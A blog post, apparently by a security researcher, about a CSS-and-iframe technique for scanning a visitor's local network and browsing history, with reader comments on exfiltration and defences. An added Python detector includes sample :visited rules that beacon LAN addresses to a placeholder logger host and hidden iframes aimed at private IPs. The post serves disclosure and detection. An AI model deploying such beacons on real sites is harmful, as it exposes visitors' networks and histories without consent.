CSS LAN scanner

I think the single most insecure feature of internet browsers today is iframes: you can do too much with them, and I feel I’ve only touched the surface with the examples I’ve shown. My next tool shows how simple it is to scan your entire local network from the internet using iframes, CSS and absolutely no JavaScript!

Update…

Geez, I’ve never had so many 403 errors in my Apache logs. You don’t need the folder contents, people! Look, the code is in CSS, so you don’t need any other code, got it? Well, stop trying to grab the contents of a directory that is in plain sight. Some people!

Whitepaper released

I don’t normally agree with releasing whitepapers on subjects because I believe you don’t need an essay to explain this stuff; all you need is to look at the code. But I thought I would make an exception, so here is a whitepaper about this subject:-

CSS Whitepaper

Run for the hills the internet is falling apart!

CSS LAN Scanner

Here are some more CSS scanners that I’ve been told about:-
RSnake’s CSS scanner
PDP’s noscript scanner
Jeremiah Grossman’s CSS History hack
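A defender-side check for the pattern the post describes (hidden iframes aimed at LAN addresses to seed the history, then :visited rules whose url() only fires a request for addresses that are now in the history). This is an added example, not the post’s scanner or any code by its author; the stylesheet and page fragment are constructed, and logger.example is a placeholder host.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed stylesheet: one link per LAN address, and a :visited rule whose
# url() is only fetched if that address is in the browser's history.
# The third rule styles visited links without a request; the fourth uses
# url() without :visited. Neither should be flagged.
SAMPLE_CSS = """
a#r1:visited { background: url(http://logger.example/hit?ip=192.168.1.1); }
a#r2:visited { background-image: url("http://logger.example/hit?ip=10.0.0.1"); }
a:visited { color: purple; }
body { background: url(/img/bg.png); }
"""

# Constructed page fragment: hidden iframes that seed history with LAN URLs.
SAMPLE_HTML = """
<iframe src="http://192.168.1.1/" style="display:none"></iframe>
<iframe src='http://10.0.0.1/' width=0 height=0></iframe>
<iframe src="http://localhost:8080/"></iframe>
<iframe src="https://example.com/widget"></iframe>
"""

RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)          # selector { decls }
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)")            # url(...) argument
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*?\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

def find_visited_beacons(css: str) -> list[tuple[str, str]]:
    """Return (selector, url) pairs where a :visited rule triggers a request.
    A :visited selector combined with url() is the history-leak signature."""
    hits = []
    for selector, decls in RULE_RE.findall(css):
        selector = selector.strip()
        if ":visited" not in selector:
            continue
        for url in URL_RE.findall(decls):
            hits.append((selector, url))
    return hits

def is_local_target(url: str) -> bool:
    """True if the URL host is 'localhost', loopback, link-local or RFC 1918."""
    host = urlsplit(url).hostname
    if not host:
        return False
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a public hostname, not a LAN probe
    return ip.is_private or ip.is_loopback or ip.is_link_local

def find_lan_iframes(html: str) -> list[str]:
    """Return iframe src values that point into the viewer's local network."""
    return [src for src in IFRAME_SRC_RE.findall(html) if is_local_target(src)]
```

Run over a third-party stylesheet or page at a proxy or in a content review, both functions turn the commenters’ question of "how would the result get back?" into a concrete signature to look for.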

24 Responses to “CSS LAN scanner”

  1. Bipin 3~ Upadhyay writes:

    Scary (and refreshing) Stuff Gareth. 🙂

    Two questions though:
    1. My n/w lies neither in 10.x.x.x nor 192.x.x.x, yet the scanner is able to identify a number of devices. How’s that? :-/
    2. How are you identifying the device type?

  2. Gareth Heyes writes:

    1. I’ve tested it in Firefox so it might not work in other browsers. If you’ve visited 10.x.x.x or 192.x.x.x or changed addresses it will display them. This could also be used to display which addresses you have been to, a full CSS history hack without JavaScript, similar to Jeremiah Grossman’s.
    2. The device type is based on the default out of the box IP address which a device automatically gets assigned.

    Scary stuff indeed

  3. Gareth Heyes writes:

    Even more is possible with CSS and I’m going to update my CSS attacks page with new attacks soon.

  4. Nicolas Grekas writes:

    How could this be useful to Dr Evil?
    I am able to scan MY network. OK. So what? How could this info be transmitted back? Without JavaScript, I can’t think of any way. Am I wrong?

  5. Gareth Heyes writes:

    Well a lot more is possible than you think. Stay tuned for my next example….CSS scripting!

  6. Gareth Heyes writes:

    OK no JavaScript just CSS! It will scan your IP and store it in a session as proof that it is possible. Tested only on Firefox, I told you the internet was falling apart 😉

  7. Gareth Heyes writes:

    This also proves that any web site you visit can be tracked purely with CSS. I’d do a demo but I don’t think it is necessary really, I think I’ve already proven my point.

  8. David Stone writes:

    Might want to add HTTPS links to that CSS. For instance, my router is at 192.168.1.1, but I’ve turned off HTTP access to the dd-wrt control panel, so it doesn’t show up.

  9. Gareth Heyes writes:

    Good point David, thanks! I’m planning to add router DNS names if I can find a list to successfully identify routers. Good thinking btw with your router.

  10. Thorin writes:

    Uh is there something up with the whitepaper? I tried that URL and it came back blank, reloaded a few times same thing. View page source comes back with just a few lines, nothing between the body tags.

  11. Gareth Heyes writes:

    Sorry Thorin just my sense of humor. I don’t believe in them.

  12. Ronald writes:

    haha a real whitepaper! I still wait for black paper.

    Oh no! Gareth what have you done!? I’m afraid surfing the interwebs… 4 real 🙂

  13. Gareth Heyes writes:

    hehe 🙂 I don’t like being serious all the time

    Yep there’s not much you can do, who’s gonna turn off CSS lol.

  14. Ronald writes:

    hehe 😀

    We are getting there… Soon I have another post which probably will shock some. 😉 not all, some. 🙂

  15. Gareth Heyes writes:

    Yep I know what you mean *some* will know what you can do with it and *some* will not 😉

  16. Ronald writes:

    Let’s call the web deceased shall we? Or at least web security is a myth. 😉

  17. Gareth Heyes writes:

    Yep in the last few years the browser manufacturers have been very lazy regarding new security policies.

    I’m just looking at the Firefox CSS features now and I can see huge scope for security problems, when I release the CSK (CSS Scripting Kit) you’ll see some of the issues.

    Web security is certainly a myth, time they got their act together!

  18. Unomi writes:

    This is only based on the browsers history. What if one cleans the history every minute?

    Is every browser vulnerable?

    BTW, this attack is not limited to HTTP requests. Any request to a URL supported by a browser can be logged. Say, FTP (ftp://), or port numbers (http://localhost:8080/) can be logged without notice.

    Awesome if you want to exploit it, a nightmare if you want to prevent it.

    – Unomi –

  19. Gareth Heyes writes:

    Cleaning your history will do no good for CSS LAN scanning because the script actually creates the history on page load, therefore the only protection is to disable visited in CSS.

    Yes any url that can be opened by iframes is available to be exploited.

  20. Gareth Heyes writes:

    I realise that this does leave Firefox and probably other browsers open to attack but I’m sick and tired of communicating with manufacturers who seem to think they know better than me and dismiss my reports.

    I’ve also had enough with the biased media coverage of security blogs, to the point now where I don’t even care. It is laughable that this article will never get coverage, so I’m leaving it up to the manufacturers to monitor my web site, because why should I go to all the effort for nothing?

  21. Unomi writes:

    One more comment/question….

    CSS allows overruling previously set definitions. Isn’t it possible to overrule any ‘visited’ property with a default value? This way the URL shouldn’t be requested.

    Or am I wrong?

    – Unomi –

  22. Gareth Heyes writes:

    Hi Unomi

    If you mean as a protection against LAN scanning then I don’t think it would make any difference, unfortunately, because if you reset all visited states, the scanner then creates a new set of history, therefore overwriting the rule.

    The only way I could think to protect against this sort of attack would be to use something like Stylish to disable the visited state altogether so the site in question cannot access the visited selector.

  23. Gareth Heyes writes:

    Some of you may have experienced some problems storing the IP address on Firefox. I have found the problem happens when the user agent hasn’t been set for the browser.

    This is because of the security filters on my site, so the scanner will work in Firefox on all platforms.

  24. tiffany writes:

    I have something to ask:
    what if the 2 IP numbers are the same on the e-mail, does it mean the same person is using the same account?